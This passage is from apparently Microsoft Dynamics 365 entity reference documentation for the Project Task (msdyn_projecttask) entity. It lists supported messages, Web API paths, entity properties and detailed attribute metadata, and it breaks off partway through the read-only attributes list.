href="Microsoft.Dynamics.CRM.ModifyAccess?text=ModifyAccess Action" />|<xref:Microsoft.Crm.Sdk.Messages.ModifyAccessRequest>| |msdyn_AssignResourcesForTask|<xref href="Microsoft.Dynamics.CRM.msdyn_AssignResourcesForTask?text=msdyn_AssignResourcesForTask Action" />|Type generated by CrmSvcUtil.exe or use <xref:Microsoft.Xrm.Sdk.OrganizationRequest> setting the required parameters for the message. | |msdyn_BulkCreatePredecessorsForTask|<xref href="Microsoft.Dynamics.CRM.msdyn_BulkCreatePredecessorsForTask?text=msdyn_BulkCreatePredecessorsForTask Action" />|Type generated by CrmSvcUtil.exe or use <xref:Microsoft.Xrm.Sdk.OrganizationRequest> setting the required parameters for the message. | |msdyn_BulkDeletePredecessorsForTask|<xref href="Microsoft.Dynamics.CRM.msdyn_BulkDeletePredecessorsForTask?text=msdyn_BulkDeletePredecessorsForTask Action" />|Type generated by CrmSvcUtil.exe or use <xref:Microsoft.Xrm.Sdk.OrganizationRequest> setting the required parameters for the message. | |msdyn_DeleteEstimatesForProjectTask|<xref href="Microsoft.Dynamics.CRM.msdyn_DeleteEstimatesForProjectTask?text=msdyn_DeleteEstimatesForProjectTask Action" />|Type generated by CrmSvcUtil.exe or use <xref:Microsoft.Xrm.Sdk.OrganizationRequest> setting the required parameters for the message. | |msdyn_IndentWBSTask|<xref href="Microsoft.Dynamics.CRM.msdyn_IndentWBSTask?text=msdyn_IndentWBSTask Action" />|Type generated by CrmSvcUtil.exe or use <xref:Microsoft.Xrm.Sdk.OrganizationRequest> setting the required parameters for the message. | |msdyn_MoveDownWBSTask|<xref href="Microsoft.Dynamics.CRM.msdyn_MoveDownWBSTask?text=msdyn_MoveDownWBSTask Action" />|Type generated by CrmSvcUtil.exe or use <xref:Microsoft.Xrm.Sdk.OrganizationRequest> setting the required parameters for the message. | |msdyn_MoveUpWBSTask|<xref href="Microsoft.Dynamics.CRM.msdyn_MoveUpWBSTask?text=msdyn_MoveUpWBSTask Action" />|Type generated by CrmSvcUtil.exe or use <xref:Microsoft.Xrm.Sdk.OrganizationRequest> setting the required parameters for the message. | |msdyn_OutdentWBSTask|<xref href="Microsoft.Dynamics.CRM.msdyn_OutdentWBSTask?text=msdyn_OutdentWBSTask Action" />|Type generated by CrmSvcUtil.exe or use <xref:Microsoft.Xrm.Sdk.OrganizationRequest> setting the required parameters for the message. | |msdyn_updateprojecttask|<xref href="Microsoft.Dynamics.CRM.msdyn_updateprojecttask?text=msdyn_updateprojecttask Action" />|Type generated by CrmSvcUtil.exe or use <xref:Microsoft.Xrm.Sdk.OrganizationRequest> setting the required parameters for the message. | |Retrieve|GET [*org URI*]/api/data/v9.0/msdyn_projecttasks(*msdyn_projecttaskid*)<br />See [Retrieve](/powerapps/developer/common-data-service/webapi/retrieve-entity-using-web-api)|<xref:Microsoft.Xrm.Sdk.Messages.RetrieveRequest> or <br /><xref:Microsoft.Xrm.Sdk.IOrganizationService.Retrieve*>| |RetrieveMultiple|GET [*org URI*]/api/data/v9.0/msdyn_projecttasks<br />See [Query Data](/powerapps/developer/common-data-service/webapi/query-data-web-api)|<xref:Microsoft.Xrm.Sdk.Messages.RetrieveMultipleRequest> or <br /><xref:Microsoft.Xrm.Sdk.IOrganizationService.RetrieveMultiple*>| |RetrievePrincipalAccess|<xref href="Microsoft.Dynamics.CRM.RetrievePrincipalAccess?text=RetrievePrincipalAccess Function" />|<xref:Microsoft.Crm.Sdk.Messages.RetrievePrincipalAccessRequest>| |RetrieveSharedPrincipalsAndAccess|<xref href="Microsoft.Dynamics.CRM.RetrieveSharedPrincipalsAndAccess?text=RetrieveSharedPrincipalsAndAccess Function" />|<xref:Microsoft.Crm.Sdk.Messages.RetrieveSharedPrincipalsAndAccessRequest>| |RevokeAccess|<xref href="Microsoft.Dynamics.CRM.RevokeAccess?text=RevokeAccess Action" />|<xref:Microsoft.Crm.Sdk.Messages.RevokeAccessRequest>| |SetState|PATCH [*org URI*]/api/data/v9.0/msdyn_projecttasks(*msdyn_projecttaskid*)<br />[Update](/powerapps/developer/common-data-service/webapi/update-delete-entities-using-web-api#basic-update) `statecode` and `statuscode` properties.|<xref:Microsoft.Crm.Sdk.Messages.SetStateRequest>| |Update|PATCH [*org URI*]/api/data/v9.0/msdyn_projecttasks(*msdyn_projecttaskid*)<br />See [Update](/powerapps/developer/common-data-service/webapi/update-delete-entities-using-web-api#basic-update)|<xref:Microsoft.Xrm.Sdk.Messages.UpdateRequest> or <br /><xref:Microsoft.Xrm.Sdk.IOrganizationService.Update*>| ## Entity Properties |Property|Value| |--------|-----| |CollectionSchemaName|msdyn_projecttasks| |DisplayCollectionName|Project Tasks| |DisplayName|Project Task| |EntitySetName|msdyn_projecttasks| |IsBPFEntity|False| |LogicalCollectionName|msdyn_projecttasks| |LogicalName|msdyn_projecttask| |OwnershipType|UserOwned| |PrimaryIdAttribute|msdyn_projecttaskid| |PrimaryNameAttribute|msdyn_subject| |SchemaName|msdyn_projecttask| <a name="writable-attributes"></a> ## Writable attributes These attributes return true for either **IsValidForCreate** or **IsValidForUpdate** (usually both). Listed by **SchemaName**. - [ImportSequenceNumber](#BKMK_ImportSequenceNumber) - [msdyn_Actualcost](#BKMK_msdyn_Actualcost) - [msdyn_actualdurationminutes](#BKMK_msdyn_actualdurationminutes) - [msdyn_ActualEffort](#BKMK_msdyn_ActualEffort) - [msdyn_actualend](#BKMK_msdyn_actualend) - [msdyn_ActualSales](#BKMK_msdyn_ActualSales) - [msdyn_actualstart](#BKMK_msdyn_actualstart) - [msdyn_AggregationDirection](#BKMK_msdyn_AggregationDirection) - [msdyn_AssignedResources](#BKMK_msdyn_AssignedResources) - [msdyn_AssignedTeamMembers](#BKMK_msdyn_AssignedTeamMembers) - [msdyn_autoscheduling](#BKMK_msdyn_autoscheduling) - [msdyn_CostEstimateContour](#BKMK_msdyn_CostEstimateContour) - [msdyn_description](#BKMK_msdyn_description) - [msdyn_duration](#BKMK_msdyn_duration) - [msdyn_Effort](#BKMK_msdyn_Effort) - [msdyn_EffortContour](#BKMK_msdyn_EffortContour) - [msdyn_EffortEstimateAtComplete](#BKMK_msdyn_EffortEstimateAtComplete) - [msdyn_IsLineTask](#BKMK_msdyn_IsLineTask) - [msdyn_IsMilestone](#BKMK_msdyn_IsMilestone) - [msdyn_MSProjectClientId](#BKMK_msdyn_MSProjectClientId) - [msdyn_numberofresources](#BKMK_msdyn_numberofresources) - [msdyn_parenttask](#BKMK_msdyn_parenttask) - [msdyn_plannedCost](#BKMK_msdyn_plannedCost) - [msdyn_PlannedSales](#BKMK_msdyn_PlannedSales) - [msdyn_PluginProcessingData](#BKMK_msdyn_PluginProcessingData) - [msdyn_Progress](#BKMK_msdyn_Progress) - [msdyn_project](#BKMK_msdyn_project) - [msdyn_projecttaskId](#BKMK_msdyn_projecttaskId) - [msdyn_RemainingCost](#BKMK_msdyn_RemainingCost) - [msdyn_RemainingHours](#BKMK_msdyn_RemainingHours) - [msdyn_RemainingSales](#BKMK_msdyn_RemainingSales) - [msdyn_RequestedHours](#BKMK_msdyn_RequestedHours) - [msdyn_resourcecategory](#BKMK_msdyn_resourcecategory) - [msdyn_ResourceOrganizationalUnitId](#BKMK_msdyn_ResourceOrganizationalUnitId) - [msdyn_ResourceUtilization](#BKMK_msdyn_ResourceUtilization) - [msdyn_SalesEstimateContour](#BKMK_msdyn_SalesEstimateContour) - [msdyn_scheduleddurationminutes](#BKMK_msdyn_scheduleddurationminutes) - [msdyn_scheduledend](#BKMK_msdyn_scheduledend) - [msdyn_ScheduledHours](#BKMK_msdyn_ScheduledHours) - [msdyn_scheduledstart](#BKMK_msdyn_scheduledstart) - [msdyn_ScheduleVariance](#BKMK_msdyn_ScheduleVariance) - [msdyn_skipupdateestimateline](#BKMK_msdyn_skipupdateestimateline) - [msdyn_subject](#BKMK_msdyn_subject) - [msdyn_transactioncategory](#BKMK_msdyn_transactioncategory) - [msdyn_WBSID](#BKMK_msdyn_WBSID) - [OverriddenCreatedOn](#BKMK_OverriddenCreatedOn) - [OwnerId](#BKMK_OwnerId) - [OwnerIdType](#BKMK_OwnerIdType) - [processid](#BKMK_processid) - [StageId](#BKMK_StageId) - [statecode](#BKMK_statecode) - [statuscode](#BKMK_statuscode) - [TimeZoneRuleVersionNumber](#BKMK_TimeZoneRuleVersionNumber) - [TransactionCurrencyId](#BKMK_TransactionCurrencyId) - [traversedpath](#BKMK_traversedpath) - [UTCConversionTimeZoneCode](#BKMK_UTCConversionTimeZoneCode) ### <a name="BKMK_ImportSequenceNumber"></a> ImportSequenceNumber |Property|Value| |--------|-----| |Description|Sequence number of the import that created this record.| |DisplayName|Import Sequence Number| |Format|None| |IsValidForForm|False| |IsValidForRead|True| |IsValidForUpdate|False| |LogicalName|importsequencenumber| |MaxValue|2147483647| |MinValue|-2147483648| |RequiredLevel|None| |Type|Integer| ### <a name="BKMK_msdyn_Actualcost"></a> msdyn_Actualcost |Property|Value| |--------|-----| |Description|Enter the value of the actual cost consumed based on work reported to be completed on the task. | |DisplayName|Actual Cost| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_actualcost| |MaxValue|922337203685477| |MinValue|0| |Precision|4| |PrecisionSource|2| |RequiredLevel|Recommended| |Type|Money| ### <a name="BKMK_msdyn_actualdurationminutes"></a> msdyn_actualdurationminutes |Property|Value| |--------|-----| |Description|Shows the actual duration of the project task in days| |DisplayName|Actual Duration| |Format|Duration| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_actualdurationminutes| |MaxValue|2147483647| |MinValue|0| |RequiredLevel|None| |Type|Integer| ### <a name="BKMK_msdyn_ActualEffort"></a> msdyn_ActualEffort |Property|Value| |--------|-----| |Description|Shows the hours submitted against the task.| |DisplayName|Actual Hours| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_actualeffort| |MaxValue|1000000000| |MinValue|0| |Precision|2| |RequiredLevel|Recommended| |Type|Double| ### <a name="BKMK_msdyn_actualend"></a> msdyn_actualend |Property|Value| |--------|-----| |DateTimeBehavior|UserLocal| |Description|Enter the actual end time of the project task.| |DisplayName|Actual End Date/Time| |Format|DateAndTime| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_actualend| |RequiredLevel|None| |Type|DateTime| ### <a name="BKMK_msdyn_ActualSales"></a> msdyn_ActualSales |Property|Value| |--------|-----| |Description|Actual Sales Amount| |DisplayName|Actual Sales| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_actualsales| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|4| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_actualstart"></a> msdyn_actualstart |Property|Value| |--------|-----| |DateTimeBehavior|UserLocal| |Description|Enter the actual start time of the project task.| |DisplayName|Actual Start| |Format|DateAndTime| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_actualstart| |RequiredLevel|None| |Type|DateTime| ### <a name="BKMK_msdyn_AggregationDirection"></a> msdyn_AggregationDirection |Property|Value| |--------|-----| |Description|Shows whether the aggregation is happening upstream or downstream.| |DisplayName|Aggregation Direction| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_aggregationdirection| |RequiredLevel|None| |Type|Picklist| #### msdyn_AggregationDirection Options |Value|Label| |-----|-----| |0|Upstream| |1|Downstream| |2|Both| ### <a name="BKMK_msdyn_AssignedResources"></a> msdyn_AssignedResources |Property|Value| |--------|-----| |Description|Type the project team members that are assigned to task.| |DisplayName|Assigned Resources (Deprecated in v3.0)| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_assignedresources| |MaxLength|300| |RequiredLevel|None| |Type|String| ### <a name="BKMK_msdyn_AssignedTeamMembers"></a> msdyn_AssignedTeamMembers |Property|Value| |--------|-----| |Description|Select the project team member that has been assigned to a task.| |DisplayName|Assigned Team Members (Deprecated in v3.0)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_assignedteammembers| |RequiredLevel|None| |Targets|msdyn_projectteam| |Type|Lookup| ### <a name="BKMK_msdyn_autoscheduling"></a> msdyn_autoscheduling |Property|Value| |--------|-----| |Description|Shows whether auto scheduling was used for this task.| |DisplayName|Auto Scheduling| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_autoscheduling| |RequiredLevel|ApplicationRequired| |Type|Boolean| #### msdyn_autoscheduling Options |Value|Label| |-----|-----| |1|Yes| |0|No| **DefaultValue**: True ### <a name="BKMK_msdyn_CostEstimateContour"></a> msdyn_CostEstimateContour |Property|Value| |--------|-----| |Description|The cost estimate contour for the task| |DisplayName|CostEstimateContour (Deprecated in v3.0)| |Format|Text| |IsLocalizable|False| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_costestimatecontour| |MaxLength|1048576| |RequiredLevel|None| |Type|Memo| ### <a name="BKMK_msdyn_description"></a> msdyn_description |Property|Value| |--------|-----| |Description|Enter a description of the project task.| |DisplayName|Description| |Format|Text| |IsLocalizable|False| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_description| |MaxLength|2000| |RequiredLevel|None| |Type|Memo| ### <a name="BKMK_msdyn_duration"></a> msdyn_duration |Property|Value| |--------|-----| |Description|Shows the duration in days for the task.| |DisplayName|Duration| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_duration| |MaxValue|1000000000| |MinValue|0| |Precision|2| |RequiredLevel|Recommended| |Type|Double| ### <a name="BKMK_msdyn_Effort"></a> msdyn_Effort |Property|Value| |--------|-----| |Description|Shows the effort hours required for the task.| |DisplayName|Estimated Effort| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_effort| |MaxValue|1000000000| |MinValue|0| |Precision|2| |RequiredLevel|Recommended| |Type|Double| ### <a name="BKMK_msdyn_EffortContour"></a> msdyn_EffortContour |Property|Value| |--------|-----| |Description|The effort distribution| |DisplayName|Effort Contour (Deprecated in v3.0)| |Format|Text| |IsLocalizable|False| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_effortcontour| |MaxLength|1048576| |RequiredLevel|None| |Type|Memo| ### <a name="BKMK_msdyn_EffortEstimateAtComplete"></a> msdyn_EffortEstimateAtComplete |Property|Value| |--------|-----| |Description|Shows the forecast of total effort to complete the task.| |DisplayName|Effort estimate at complete (EAC)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_effortestimateatcomplete| |MaxValue|1000000000| |MinValue|0| |Precision|2| |RequiredLevel|Recommended| |Type|Double| ### <a name="BKMK_msdyn_IsLineTask"></a> msdyn_IsLineTask |Property|Value| |--------|-----| |Description|Shows whether the task is a line task| |DisplayName|IsLineTask| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_islinetask| |RequiredLevel|None| |Type|Boolean| #### msdyn_IsLineTask Options |Value|Label| |-----|-----| |1|Yes| |0|No| **DefaultValue**: False ### <a name="BKMK_msdyn_IsMilestone"></a> msdyn_IsMilestone |Property|Value| |--------|-----| |Description|Show whether this task is a milestone.| |DisplayName|Is Milestone| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_ismilestone| |RequiredLevel|None| |Type|Boolean| #### msdyn_IsMilestone Options |Value|Label| |-----|-----| |1|Yes| |0|No| **DefaultValue**: False ### <a name="BKMK_msdyn_MSProjectClientId"></a> msdyn_MSProjectClientId |Property|Value| |--------|-----| |Description|The id of the project task in MS Project Client.| |DisplayName|MS Project Client Id| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_msprojectclientid| |MaxLength|100| |RequiredLevel|None| |Type|String| ### <a name="BKMK_msdyn_numberofresources"></a> msdyn_numberofresources |Property|Value| |--------|-----| |Description|Shows the number of resources that are estimated for the task. This is not the number of resources assigned to the task.| |DisplayName|Number of resources (Deprecated in v3.0)| |Format|None| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_numberofresources| |MaxValue|2147483647| |MinValue|0| |RequiredLevel|None| |Type|Integer| ### <a name="BKMK_msdyn_parenttask"></a> msdyn_parenttask |Property|Value| |--------|-----| |Description|Select the summary or parent task in the hierarchy that contains a child task.| |DisplayName|Parent Task| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_parenttask| |RequiredLevel|None| |Targets|msdyn_projecttask| |Type|Lookup| ### <a name="BKMK_msdyn_plannedCost"></a> msdyn_plannedCost |Property|Value| |--------|-----| |Description|Enter the value of the cost the service provider will incur based on the estimated work and cost rates in the pricelist.| |DisplayName|Planned cost| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_plannedcost| |MaxValue|922337203685477| |MinValue|0| |Precision|4| |PrecisionSource|2| |RequiredLevel|Recommended| |Type|Money| ### <a name="BKMK_msdyn_PlannedSales"></a> msdyn_PlannedSales |Property|Value| |--------|-----| |Description|Planned Sales Amount| |DisplayName|Planned Sales| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_plannedsales| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|4| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_PluginProcessingData"></a> msdyn_PluginProcessingData |Property|Value| |--------|-----| |Description|Processing data for the plugin pipeline| |DisplayName|Plugin Processing Data| |Format|None| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_pluginprocessingdata| |MaxValue|2147483647| |MinValue|0| |RequiredLevel|None| |Type|Integer| ### <a name="BKMK_msdyn_Progress"></a> msdyn_Progress |Property|Value| |--------|-----| |Description|Enter the percentage indicating work completed.| |DisplayName|Progress %| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_progress| |MaxValue|100| |MinValue|0| |Precision|2| |RequiredLevel|Recommended| |Type|Decimal| ### <a name="BKMK_msdyn_project"></a> msdyn_project |Property|Value| |--------|-----| |Description|Select the project name.| |DisplayName|Project| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_project| |RequiredLevel|ApplicationRequired| |Targets|msdyn_project| |Type|Lookup| ### <a name="BKMK_msdyn_projecttaskId"></a> msdyn_projecttaskId |Property|Value| |--------|-----| |Description|Shows the entity instances.| |DisplayName|Project task| |IsValidForForm|False| |IsValidForRead|True| |IsValidForUpdate|False| |LogicalName|msdyn_projecttaskid| |RequiredLevel|SystemRequired| |Type|Uniqueidentifier| ### <a name="BKMK_msdyn_RemainingCost"></a> msdyn_RemainingCost |Property|Value| |--------|-----| |Description|Enter the cost left over that can be consumed for future work.| |DisplayName|Remaining Cost| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_remainingcost| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|4| |PrecisionSource|2| |RequiredLevel|Recommended| |Type|Money| ### <a name="BKMK_msdyn_RemainingHours"></a> msdyn_RemainingHours |Property|Value| |--------|-----| |Description|Shows the hours remaining to complete the task.| |DisplayName|Remaining Hours| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_remaininghours| |MaxValue|1000000000| |MinValue|-1000000000| |Precision|2| |RequiredLevel|Recommended| |Type|Double| ### <a name="BKMK_msdyn_RemainingSales"></a> msdyn_RemainingSales |Property|Value| |--------|-----| |Description|Remaining Sales Amount| |DisplayName|Remaining Sales| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_remainingsales| |MaxValue|922337203685477| |MinValue|-922337203685477| |Precision|4| |PrecisionSource|2| |RequiredLevel|None| |Type|Money| ### <a name="BKMK_msdyn_RequestedHours"></a> msdyn_RequestedHours |Property|Value| |--------|-----| |Description|Shows the hours assigned by generic resource.| |DisplayName|Requested Hours| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_requestedhours| |MaxValue|1000000000| |MinValue|0| |Precision|2| |RequiredLevel|None| |Type|Double| ### <a name="BKMK_msdyn_resourcecategory"></a> msdyn_resourcecategory |Property|Value| |--------|-----| |Description|Select the resource role for the task.| |DisplayName|Role (Deprecated in v3.0)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_resourcecategory| |RequiredLevel|None| |Targets|bookableresourcecategory| |Type|Lookup| ### <a name="BKMK_msdyn_ResourceOrganizationalUnitId"></a> msdyn_ResourceOrganizationalUnitId |Property|Value| |--------|-----| |Description|Select the organizational unit of the resource who should perform the work.| |DisplayName|Resourcing unit (Deprecated in v3.0)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_resourceorganizationalunitid| |RequiredLevel|None| |Targets|msdyn_organizationalunit| |Type|Lookup| ### <a name="BKMK_msdyn_ResourceUtilization"></a> msdyn_ResourceUtilization |Property|Value| |--------|-----| |Description|Shows the utilization units for a resource that is assigned to a project task| |DisplayName|ResourceUtilization| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_resourceutilization| |MaxValue|100000000000| |MinValue|0| |Precision|2| |RequiredLevel|None| |Type|Decimal| ### <a name="BKMK_msdyn_SalesEstimateContour"></a> msdyn_SalesEstimateContour |Property|Value| |--------|-----| |Description|The sales estimate contour| |DisplayName|SalesEstimateContour (Deprecated in v3.0)| |Format|Text| |IsLocalizable|False| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_salesestimatecontour| |MaxLength|1048576| |RequiredLevel|None| |Type|Memo| ### <a name="BKMK_msdyn_scheduleddurationminutes"></a> msdyn_scheduleddurationminutes |Property|Value| |--------|-----| |Description|Shows the scheduled duration of the project task, specified in minutes.| |DisplayName|Scheduled Duration| |Format|Duration| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_scheduleddurationminutes| |MaxValue|2147483647| |MinValue|0| |RequiredLevel|None| |Type|Integer| ### <a name="BKMK_msdyn_scheduledend"></a> msdyn_scheduledend |Property|Value| |--------|-----| |DateTimeBehavior|UserLocal| |Description|Enter the scheduled end time of the project.| |DisplayName|Due Date| |Format|DateOnly| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_scheduledend| |RequiredLevel|None| |Type|DateTime| ### <a name="BKMK_msdyn_ScheduledHours"></a> msdyn_ScheduledHours |Property|Value| |--------|-----| |Description|Shows the scheduled hours for the task.| |DisplayName|Scheduled Hours (Deprecated in v3.0)| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_scheduledhours| |MaxValue|1000000000| |MinValue|0| |Precision|2| |RequiredLevel|None| |Type|Double| ### <a name="BKMK_msdyn_scheduledstart"></a> msdyn_scheduledstart |Property|Value| |--------|-----| |DateTimeBehavior|UserLocal| |Description|Enter the scheduled start time of the project task.| |DisplayName|Start Date| |Format|DateOnly| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_scheduledstart| |RequiredLevel|None| |Type|DateTime| ### <a name="BKMK_msdyn_ScheduleVariance"></a> msdyn_ScheduleVariance |Property|Value| |--------|-----| |Description|Shows the variance between the estimated work and the forecasted work based on the estimate at completion (EAC).| |DisplayName|Schedule Variance| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_schedulevariance| |MaxValue|1000000000| |MinValue|-1000000000| |Precision|2| |RequiredLevel|Recommended| |Type|Double| ### <a name="BKMK_msdyn_skipupdateestimateline"></a> msdyn_skipupdateestimateline |Property|Value| |--------|-----| |Description|Internal flag to avoid the update process on the estimate lines of the project task| |DisplayName|Skip Update Estimate Line| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_skipupdateestimateline| |RequiredLevel|None| |Type|Boolean| #### msdyn_skipupdateestimateline Options |Value|Label| |-----|-----| |1|Yes| |0|No| **DefaultValue**: False ### <a name="BKMK_msdyn_subject"></a> msdyn_subject |Property|Value| |--------|-----| |Description|Type the name of the custom entity.| |DisplayName|Project Task Name| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_subject| |MaxLength|450| |RequiredLevel|ApplicationRequired| |Type|String| ### <a name="BKMK_msdyn_transactioncategory"></a> msdyn_transactioncategory |Property|Value| |--------|-----| |Description|Select the transaction category for the task.| |DisplayName|Category| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_transactioncategory| |RequiredLevel|None| |Targets|msdyn_transactioncategory| |Type|Lookup| ### <a name="BKMK_msdyn_WBSID"></a> msdyn_WBSID |Property|Value| |--------|-----| |Description|Shows the ID of the task in the work breakdown structure (WBS).| |DisplayName|WBS ID| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|msdyn_wbsid| |MaxLength|100| |RequiredLevel|None| |Type|String| ### <a name="BKMK_OverriddenCreatedOn"></a> OverriddenCreatedOn |Property|Value| |--------|-----| |DateTimeBehavior|UserLocal| |Description|Date and time that the record was migrated.| |DisplayName|Record Created On| |Format|DateOnly| |IsValidForForm|False| |IsValidForRead|True| |IsValidForUpdate|False| |LogicalName|overriddencreatedon| |RequiredLevel|None| |Type|DateTime| ### <a name="BKMK_OwnerId"></a> OwnerId **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Owner Id| |DisplayName|Owner| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|ownerid| |RequiredLevel|SystemRequired| |Targets|systemuser,team| |Type|Owner| ### <a name="BKMK_OwnerIdType"></a> OwnerIdType **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Owner Id Type| |DisplayName|| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|owneridtype| |RequiredLevel|SystemRequired| |Type|EntityName| ### <a name="BKMK_processid"></a> processid **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Contains the id of the process associated with the entity.| |DisplayName|Process Id| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|processid| |RequiredLevel|None| |Type|Uniqueidentifier| ### <a name="BKMK_StageId"></a> StageId **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Unique identifier of the Stage.| |DisplayName|Process Stage| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|stageid| |RequiredLevel|None| |Type|Uniqueidentifier| ### <a name="BKMK_statecode"></a> statecode |Property|Value| |--------|-----| |Description|Status of the Project Task| |DisplayName|Project Task Status| |IsValidForCreate|False| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|statecode| |RequiredLevel|SystemRequired| |Type|State| #### statecode Options |Value|Label|DefaultStatus|InvariantName| |-----|-----|-------------|-------------| |0|Active|1|Active| |1|Inactive|2|Inactive| ### <a name="BKMK_statuscode"></a> statuscode |Property|Value| |--------|-----| |Description|Reason for the status of the Project Task| |DisplayName|Status Reason| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|statuscode| |RequiredLevel|None| |Type|Status| #### statuscode Options |Value|Label|State| |-----|-----|-----| |1|Active|0| |2|Inactive|1| ### <a name="BKMK_TimeZoneRuleVersionNumber"></a> TimeZoneRuleVersionNumber |Property|Value| |--------|-----| |Description|For internal use only.| |DisplayName|Time Zone Rule Version Number| |Format|None| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|timezoneruleversionnumber| |MaxValue|2147483647| |MinValue|-1| |RequiredLevel|None| |Type|Integer| ### <a name="BKMK_TransactionCurrencyId"></a> TransactionCurrencyId **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|Shows the currency associated with the entity.| |DisplayName|Currency| |IsValidForForm|True| |IsValidForRead|True| |LogicalName|transactioncurrencyid| |RequiredLevel|None| |Targets|transactioncurrency| |Type|Lookup| ### <a name="BKMK_traversedpath"></a> traversedpath **Added by**: Active Solution Solution |Property|Value| |--------|-----| |Description|A comma separated list of string values representing the unique identifiers of stages in a Business Process Flow Instance in the order that they occur.| |DisplayName|Traversed Path| |FormatName|Text| |IsLocalizable|False| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|traversedpath| |MaxLength|1250| |RequiredLevel|None| |Type|String| ### <a name="BKMK_UTCConversionTimeZoneCode"></a> UTCConversionTimeZoneCode |Property|Value| |--------|-----| |Description|Time zone code that was in use when the record was created.| |DisplayName|UTC Conversion Time Zone Code| |Format|None| |IsValidForForm|False| |IsValidForRead|True| |LogicalName|utcconversiontimezonecode| |MaxValue|2147483647| |MinValue|-1| |RequiredLevel|None| |Type|Integer| <a name="read-only-attributes"></a> ## Read-only attributes These attributes return false for both **IsValidForCreate** or **IsValidForUpdate**. Listed by **SchemaName**. - [CreatedBy](#BKMK_CreatedBy) - [CreatedByName](#BKMK_CreatedByName) - [CreatedByYomiName](#BKMK_CreatedByYomiName) - [CreatedOn](#BKMK_CreatedOn) - [CreatedOnBehalfBy](#BKMK_CreatedOnBehalfBy) - [CreatedOnBehalfByName](#BKMK_CreatedOnBehalfByName) - [CreatedOnBehalfByYomiName](#BKMK_CreatedOnBehalfByYomiName) - [ExchangeRate](#BKMK_ExchangeRate) - [ModifiedBy](#BKMK_ModifiedBy) - [ModifiedByName](#BKMK_ModifiedByName) - [ModifiedByYomiName](#BKMK_ModifiedByYomiName) - [ModifiedOn](#BKMK_ModifiedOn) - [ModifiedOnBehalfBy](#BKMK_ModifiedOnBehalfBy) - [ModifiedOnBehalfByName](#BKMK_ModifiedOnBehalfByName) - [ModifiedOnBehalfByYomiName](#BKMK_ModifiedOnBehalfByYomiName) - [msdyn_actualcost_Base](#BKMK_msdyn_actualcost_Base) - [msdyn_actualsales_Base](#BKMK_msdyn_actualsales_Base) - [msdyn_AssignedTeamMembersName](#BKMK_msdyn_AssignedTeamMembersName) - [msdyn_CostAtCompleteEstimate](#BKMK_msdyn_CostAtCompleteEstimate) - [msdyn_costatcompleteestimate_Base](#BKMK_msdyn_costatcompleteestimate_Base) - [msdyn_CostConsumptionPercentage](#BKMK_msdyn_CostConsumptionPercentage) - [msdyn_parenttaskName](#BKMK_msdyn_parenttaskName) - 